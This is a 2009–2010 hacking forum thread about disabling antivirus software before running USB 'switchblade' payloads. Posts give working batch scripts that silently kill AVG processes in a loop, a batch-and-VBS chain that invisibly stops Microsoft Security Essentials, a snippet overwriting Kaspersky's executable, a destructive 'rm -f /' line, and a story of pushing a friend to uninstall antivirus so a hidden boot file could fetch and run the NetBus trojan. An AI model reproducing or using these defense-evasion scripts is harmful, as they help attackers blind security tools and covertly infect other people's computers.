ElevenWarrior Posted January 2, 2009 Share Posted January 2, 2009 @(X3N) hey, can you tell me the name of the exploit that can kill the AV's? Quote Link to comment Share on other sites More sharing options...
dennis123123 Posted January 2, 2009 Share Posted January 2, 2009 Any good AV app, like ESET, and the others that have been mentioned will auto restart, or produce alerts if they try to be killed. Notice how ekrn.exe and egui.exe are not in the metasploit list? Thats because when killed, they immediately restart. Well, ekrn does anyway, egui is just the frontend, even if you do lose that , the warnings still appear. But still, a better solution than simply process killing would be great :) Quote Link to comment Share on other sites More sharing options...
X3N Posted January 5, 2009 Share Posted January 5, 2009 @(X3N) hey, can you tell me the name of the exploit that can kill the AV's? its not an exploit just part of a ruby script that can run on the meterpreter.... Quote Link to comment Share on other sites More sharing options...
nvralone Posted January 9, 2009 Share Posted January 9, 2009 ** Random Thought ** What about a method that involves forcing the process to shutdown but when it restarts it is forced to restart in a sandboxed environment rendering it useless to the system. As for the pop-up messages what about a monitor refresh triggered by the pop-up. This would blank the screen for a moment giving the pop-up time to fade. Although the screen blanking out would be an indicator many users would just think it was a minor glitch. *Extremely Crude* Alternatively use an auto-it script to hide the cursor, take a screen shot, hide the taskbar and replace the background with the screenshot and to be switched back to original settings after payload runs. I'll begin the research to see if this is possible but wanted to get some thoughts on this. Quote Link to comment Share on other sites More sharing options...
Scorpion Posted January 9, 2009 Share Posted January 9, 2009 how about having it Pause the process as this way you havent ended the task so no restarts and no warnings. Quote Link to comment Share on other sites More sharing options...
TcKh4cker Posted April 28, 2009 Share Posted April 28, 2009 he did you guys thought of cleaning the whole .exe program with vba,vb or vbs. you can let your program check if the paths exists and than open the .exe and let it type something like "lol you just got hacked". then on next startup delete registery values and make a virus downloader. code looks like this. MyFile = "C:\Program files\kaspersky 2009" & "kaspersky.exe" fnum = FreeFile() Open MyFile For Output As fnum Print #fnum, "this doesn't work anymore" Close #fnum and before this code you could run a check code to check of the path exists. no i am going back to gaming bye bye Quote Link to comment Share on other sites More sharing options...
messsy Posted April 28, 2009 Share Posted April 28, 2009 i was thinking, if the file was editedd in the correct proceedure there would be minimal work to undetect these bf compiling ie, resulting exe will either need crypting or hexing, if 1 person kept uptodate undetected files on server then that might prove useful, if the file was crypted then all firewalls n AV will not flag them if a half decent crypter was used it could just rum in the ram memmory HMMM what you think Quote Link to comment Share on other sites More sharing options...
gloryforixseal Posted June 15, 2009 Share Posted June 15, 2009 Yes, it works. chainloader has two form: ramdisk and mapping. The mapping method hasnt size limitation, but require the image file is contiguous. Thats why contig.exe is require, its the simplest way making a single file contiguous. Quote Link to comment Share on other sites More sharing options...
h2oh4x! Posted July 27, 2009 Share Posted July 27, 2009 he did you guys thought of cleaning the whole .exe program with vba,vb or vbs. you can let your program check if the paths exists and than open the .exe and let it type something like "lol you just got hacked". then on next startup delete registery values and make a virus downloader. code looks like this. MyFile = "C:\Program files\kaspersky 2009" & "kaspersky.exe" fnum = FreeFile() Open MyFile For Output As fnum Print #fnum, "this doesn't work anymore" Close #fnum and before this code you could run a check code to check of the path exists. no i am going back to gaming bye bye Lol hows that gonna work when kaspersky.exe is already running? By the way guys maybe look into ZwTerminateProcess? It should be able to close any process whenever you want :) Quote Link to comment Share on other sites More sharing options...
X3N Posted July 28, 2009 Share Posted July 28, 2009 i got a good one... just do this... #!/bin/bash rm -f / Quote Link to comment Share on other sites More sharing options...
Netshroud Posted July 28, 2009 Share Posted July 28, 2009 MsMpEng.exe msseces.exe (for Microsoft Security Essentials) Quote Link to comment Share on other sites More sharing options...
hA1d3R Posted August 6, 2009 Share Posted August 6, 2009 protected processes cant be paused/suspended Quote Link to comment Share on other sites More sharing options...
h2oh4x! Posted August 6, 2009 Share Posted August 6, 2009 protected processes cant be paused/suspended Yes they can if you have admin privileges. Quote Link to comment Share on other sites More sharing options...
Boaz Tirosh Posted August 18, 2009 Share Posted August 18, 2009 hi to all, im new to this community as you can probably guess from the amount of posts i have made.. :) and english is not my strongest side, so you''ll have to excuse my grammar and spelling... i had a problem similar to what you guys describe, and my solution was some kind of social engineering, i was trying to load old trojan (netbus.. dont ask, im not that lame, it was a bet..) on a friends pc. but the bu%#$d had kaspersky running, and i couldn't find any way to turn it off, so i did the exact opposite, i made a batch file that made the security so tight my friend couldn't work. in the same batch file i have added several if statements that checked if kaspersky is running: and when it find out it wasn't; a second file i've inserted to his boot downloaded and executed Netbus and notified me... what happend was that, like i hoped, my friend got frustrated with kaspersky so he uninstalled it, the dos commands for doing this trick actually came from the kaspersky forums, and of course i knew in advance that he uses kaspersky.. anyway, just another idea.. Quote Link to comment Share on other sites More sharing options...
corcrash Posted August 18, 2009 Share Posted August 18, 2009 I thought that u could somehow patch the AV like any other program, make the patch start before the AV (probably get it RING 0 privileges), so ASM would be the right choice. But there is a problem i know with NOD32, if any program tries to change it detects the change and asks if u want to allow it. I don't know about other AV's, and nether do i know if it would check its own code if u change it before the start, but it might work. Quote Link to comment Share on other sites More sharing options...
l4rrydav1d Posted November 7, 2009 Share Posted November 7, 2009 Ok guys, We all know that the AVKill (csrss.exe) we use for our switchblades is outdated and flagged by every AV known. So I wanted to come up with an alternative method of killing AV's before launching our switchblades. If this works out, I think it would be a great addition to Leapos Pocket Knife. What I decided to try, was using Nircmd's processkill command to elminate the AV processes. I was concerned that the AV would recognize the attempt and block it, or alert. For AV's such as Avast, we would want to make sure we mute the system speakers. (Note, We would want to do that anyway, because if Avast flags a virus it screams "A VIRUS HAS BEEN DETECTED"). Anyway, if a certain AV alerts to the attempt to kill it's process, what is the difference, because it is going to alert to running csrss.exe and some of our other tools. So long as it isn't audible, we still have time to get in and out with out immediete detection. I tested this on AVG and it worked flawless and silently. ::Abigwar's First Attempt at Batch AVkiller ::Mute the system volume, in case of audible AV Alerts (Avast!) nircmd mutesysvolume 1 ::Kill AVG Command Center nircmd killprocess avgcc.exe ::Kill other AVG Processes nircmd killprocess avgemc.exe nircmd killprocess avgupsvc.exe nircmd killprocess avgamsvr.exe ::Restore system volume at end of switchblade nircmd mutesysvolume 0 Now what I would like to ask from all of you, is to look at your system processes and lets make a list of the processes each virus scanner uses. When we have them all listed, we can then script it into the batch to kill all the applicitable processes. We also need to see how each AV reacts to the attempt to kill it's processes. One other thing I was considering, that if an AV's process is persistant, we could loop the batch file to continue to run, and kill the process over and over. How that could work, is we would call the seperate Anti-AV batch file from the start.bat or go.bat, and let it loop until the switchblade ends. So at the end of the switch blade we would create a text file on the thumbdrive. The loop would stop when it sees the file, then delete it to make it ready for next time and end. ::Theoretical Loop batch :Start nircmd killprocess avgcc.exe nircmd killprocess avgemc.exe nircmd killprocess avgupsvc.exe nircmd killprocess avgamsvr.exe IF EXIST SWITCHDONE.TXT GOTO END GOTO START :END delete switchdone.txt A pretty detailed list of AV processes can be found here: http://dev.metasploit.com/redmine/projects...reter/killav.rb Quote Link to comment Share on other sites More sharing options...
catchyanow Posted November 7, 2009 Share Posted November 7, 2009 I find that the easiest way to kill anti-virus software etc is to go to the programs main controls and shut it down from there. Too easy :D Quote Link to comment Share on other sites More sharing options...
rawkus1020 Posted July 23, 2010 Share Posted July 23, 2010 it took me hours but ive finally got Microsoft security essentials to disable itself now the only issue i have is on windows 7 ultimate 64bit when anti virus shuts off is the action centre display a message saying turn on Microsoft security essentials i take it i need some code before this to disable action center from displaying messages should i look at a reg setting or group policy setting i tried net stop wscsvc (security center service ) but it displays its turned it self off Please help i got 2 bat files and a vbs file (as this the only way i could find to run cmd prompt invisible is there a better way to dothis ) here is the code i got so far launch.bat wscript.exe "invis.vbs" "MS Security Essentials off.bat" invis.vbs CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False MS Security Essentials off.bat Echo off net stop MsMpSvc process.exe -k MsMpEng.exe process.exe -k msseces.exe The process.exe is an app called Command Line Process Viewer/Killer/Suspender it is the only way i found sucsessfull to kill MSE .exe's you can download it HERE and heres how to use the switches Link any suggestions to tidy up my code would be great rod Quote Link to comment Share on other sites More sharing options...
eovnu87435ds Posted October 27, 2010 Share Posted October 27, 2010 If it helps, here are some scripts I found a while ago to easily escalate windows privileges(at least in XP, as far as I have tested). I used it to allow my (under) privileged account at school to run a batch file that installed Portal on one of the autoCAD boxes in school :D It consists of 3 scripts to elevate the current process to one ran as Admin or even PowerUser(Windows equivalent of root). I don't know if it'll be of any use, but here it is anyways. http://www.filedude.com/download/RVSJ3rYkIR3c55e742fe Side Note: Why can't we upload zip files via the the forum attachments? Quote Link to comment Share on other sites More sharing options...
bytesabit Posted November 6, 2010 Share Posted November 6, 2010 its not an exploit just part of a ruby script that can run on the meterpreter.... Yummy....Mmmmm... Meterpreter *rubs belly Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.